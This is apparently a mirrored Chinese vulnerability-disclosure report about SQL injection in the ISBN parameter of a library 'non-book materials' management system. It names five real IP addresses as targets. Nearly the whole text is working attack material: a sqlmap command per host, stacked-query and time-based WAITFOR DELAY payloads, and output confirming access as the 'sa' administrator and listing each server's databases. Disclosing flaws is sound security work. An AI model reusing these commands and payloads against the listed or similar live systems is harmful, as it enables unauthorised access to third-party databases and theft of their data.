VULHUB ™

### 简要描述： 某非书资料管理系统存在通用型SQL注入 ### 详细说明： 注入点ISBN http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= 1、 http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 124 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked...

### 简要描述： 某非书资料管理系统存在通用型SQL注入 ### 详细说明： 注入点ISBN http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= 1、 http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 124 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D ELAY '0:0:5'--&SSH= --- [08:37:18] [INFO] testing MySQL [08:37:18] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [08:37:18] [WARNING] the back-end DBMS is not MySQL [08:37:18] [INFO] testing Oracle [08:37:18] [WARNING] the back-end DBMS is not Oracle [08:37:18] [INFO] testing PostgreSQL [08:37:18] [WARNING] the back-end DBMS is not PostgreSQL [08:37:18] [INFO] testing Microsoft SQL Server [08:37:28] [INFO] confirming Microsoft SQL Server [08:37:49] [INFO] adjusting time delay to 1 second due to good response times [08:37:49] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [08:37:49] [INFO] fetching current user [08:37:49] [INFO] retrieved: sa current user: 'sa' [08:38:06] [INFO] fetching current database [08:38:06] [INFO] retrieved: proone current database: 'proone' [08:39:16] [INFO] fetching database names [08:39:16] [INFO] fetching number of databases [08:39:16] [INFO] retrieved: 5 [08:39:23] [INFO] retrieved: master [08:40:22] [INFO] retrieved: model [08:41:17] [INFO] retrieved: msdb [08:41:58] [INFO] retrieved: proone [08:43:13] [INFO] retrieved: tempdb available databases [5]: [*] [proone\x03] [*] master [*] model [*] msdb [*] tempdb 2、 http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 126 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D ELAY '0:0:5'--&SSH= --- [09:42:21] [INFO] testing MySQL [09:42:21] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [09:42:38] [WARNING] the back-end DBMS is not MySQL [09:42:38] [INFO] testing Oracle [09:42:55] [WARNING] the back-end DBMS is not Oracle [09:42:55] [INFO] testing PostgreSQL [09:43:12] [WARNING] the back-end DBMS is not PostgreSQL [09:43:12] [INFO] testing Microsoft SQL Server [09:43:39] [INFO] confirming Microsoft SQL Server [09:44:39] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2000 [09:44:39] [INFO] fetching current user [09:44:39] [INFO] retrieved: [09:45:06] [INFO] adjusting time delay to 4 seconds due to good response times sa1 current user: 'sa1' [09:54:25] [INFO] fetching current database [09:54:25] [INFO] retrieved: proon [10:11:41] [ERROR] invalid character detected. retrying.. [10:11:41] [WARNING] increasing time delay to 5 seconds e11 current database: 'proone11' [10:21:31] [INFO] fetching database names [10:21:31] [INFO] fetching number of databases [10:21:31] [INFO] retrieved: 12 [10:25:24] [INFO] retrieved: CDT [10:36:29] [ERROR] invalid character detected. retrying.. [10:36:29] [WARNING] increasing time delay to 6 seconds owe [10:48:58] [ERROR] invalid character detected. retrying.. [10:48:58] [WARNING] increasing time delay to 7 seconds r_CHS [11:06:25] [INFO] retrieved: idl40 [11:24:37] [INFO] retrieved: idltt [11:43:03] [INFO] retrieved: master [12:03:40] [INFO] retrieved: model [12:21:43] [INFO] retrieved: msdb [12:36:06] [INFO] retrieved: Northwind [13:07:36] [INFO] retrieved: proone [13:29:33] [INFO] retrieved: proone11 [13:56:52] [INFO] retrieved: proone28 [14:25:12] [INFO] retrieved: pubs [14:40:08] [INFO] retrieved: tempdb available databases [12]: [*] CDTower_CHS [*] idl40 [*] idltt [*] master [*] model [*] msdb [*] Northwind [*] proone [*] proone11 [*] proone28 [*] pubs [*] tempdb 3、 http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 103 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D ELAY '0:0:5'--&SSH= --- [11:03:46] [INFO] testing MySQL [11:03:46] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [11:03:51] [WARNING] the back-end DBMS is not MySQL [11:03:51] [INFO] testing Oracle [11:03:56] [WARNING] the back-end DBMS is not Oracle [11:03:56] [INFO] testing PostgreSQL [11:04:01] [WARNING] the back-end DBMS is not PostgreSQL [11:04:01] [INFO] testing Microsoft SQL Server [11:04:15] [INFO] confirming Microsoft SQL Server [11:04:51] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [11:04:52] [INFO] fetching current user [11:04:52] [INFO] retrieved: [11:05:56] [INFO] adjusting time delay to 4 seconds due to good response times p [11:06:40] [INFO] adjusting time delay to 3 seconds due to good response times roone current user: 'proone' [11:12:26] [INFO] fetching current database [11:12:26] [INFO] retrieved: prooneproone current database: 'prooneproone' [11:26:17] [INFO] fetching database names [11:26:17] [INFO] fetching number of databases [11:26:17] [INFO] retrieved: 6 [11:27:14] [INFO] retrieved: master [11:33:57] [INFO] retrieved: model [11:39:58] [INFO] retrieved: msdb [11:44:36] [INFO] retrieved: proone [11:52:01] [INFO] retrieved: prooneproone [12:05:58] [INFO] retrieved: tempdb available databases [6]: [*] master [*] model [*] msdb [*] proone [*] prooneproone [*] tempdb 4、 http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 103 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D ELAY '0:0:5'--&SSH= --- [16:17:24] [INFO] testing MySQL [16:17:24] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [16:17:29] [WARNING] the back-end DBMS is not MySQL [16:17:29] [INFO] testing Oracle [16:17:34] [WARNING] the back-end DBMS is not Oracle [16:17:34] [INFO] testing PostgreSQL [16:17:39] [WARNING] the back-end DBMS is not PostgreSQL [16:17:39] [INFO] testing Microsoft SQL Server [16:17:53] [INFO] confirming Microsoft SQL Server [16:18:31] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [16:18:31] [INFO] fetching current user [16:18:31] [INFO] retrieved: sa current user: 'sa\x03' [16:22:41] [INFO] fetching current database [16:22:41] [INFO] retrieved: proone current database: 'proone' [16:32:21] [INFO] fetching database names [16:32:21] [INFO] fetching number of databases [16:32:21] [INFO] retrieved: 6 [16:33:30] [INFO] retrieved: cadal [16:41:25] [INFO] retrieved: master [16:51:17] [INFO] retrieved: model [16:59:06] [INFO] retrieved: [17:00:51] [ERROR] invalid character detected. retrying.. [17:00:51] [WARNING] increasing time delay to 6 seconds msdb [17:08:21] [INFO] retrieved: proone [17:18:53] [INFO] retrieved: te [17:23:43] [ERROR] invalid character detected. retrying.. [17:23:43] [WARNING] increasing time delay to 7 seconds mpdb available databases [6]: [*] [cadal\x03] [*] [master\x19] [*] [msdb\x02] [*] model [*] proone [*] tempdb 5、 http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= sqlmap.py -u "http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 102 HTTP(s) req uests: --- Place: GET Parameter: ISBN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR D ELAY '0:0:5'--&SSH= --- [16:55:36] [INFO] testing MySQL [16:55:36] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [16:55:53] [WARNING] the back-end DBMS is not MySQL [16:55:53] [INFO] testing Oracle [16:56:10] [WARNING] the back-end DBMS is not Oracle [16:56:10] [INFO] testing PostgreSQL [16:56:27] [WARNING] the back-end DBMS is not PostgreSQL [16:56:27] [INFO] testing Microsoft SQL Server [16:56:54] [INFO] confirming Microsoft SQL Server [16:57:54] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2000 [16:57:54] [INFO] fetching current user [16:57:54] [INFO] retrieved: [16:58:21] [INFO] adjusting time delay to 4 seconds due to good response times sa current user: 'sa' [17:05:10] [INFO] fetching current database [17:05:10] [INFO] retrieved: proone current database: 'proone' [17:24:17] [INFO] fetching database names [17:24:17] [INFO] fetching number of databases [17:24:18] [INFO] retrieved: 9 [17:26:56] [INFO] retrieved: cxbook [17:45:46] [INFO] retrieved: Dservices [18:12:08] [INFO] retrieved: ma [18:20:17] [ERROR] invalid character detected. retrying.. [18:20:17] [WARNING] increasing time delay to 5 seconds s [18:26:22] [ERROR] invalid character detected. retrying.. [18:26:22] [WARNING] increasing time delay to 6 seconds t [18:32:48] [ERROR] invalid character detected. retrying.. [18:32:48] [WARNING] increasing time delay to 7 seconds er [18:40:51] [INFO] retrieved: model [18:59:01] [INFO] retrieved: msd [19:11:37] [ERROR] invalid character detected. retrying.. [19:11:37] [WARNING] increasing time delay to 8 seconds b [19:16:38] [INFO] retrieved: N [19:23:34] [ERROR] invalid character detected. retrying.. [19:23:34] [WARNING] increasing time delay to 9 seconds orthwind [19:54:29] [INFO] retrieved: [19:58:34] [ERROR] unable to properly validate last character value ('p').. proone [20:15:05] [INFO] retrieved: pubs [20:28:41] [INFO] retrieved: tempdb available databases [9]: [*] cxbook [*] Dservices [*] master [*] model [*] msdb [*] Northwind [*] proone [*] pubs [*] tempdb ### 漏洞证明： 已证明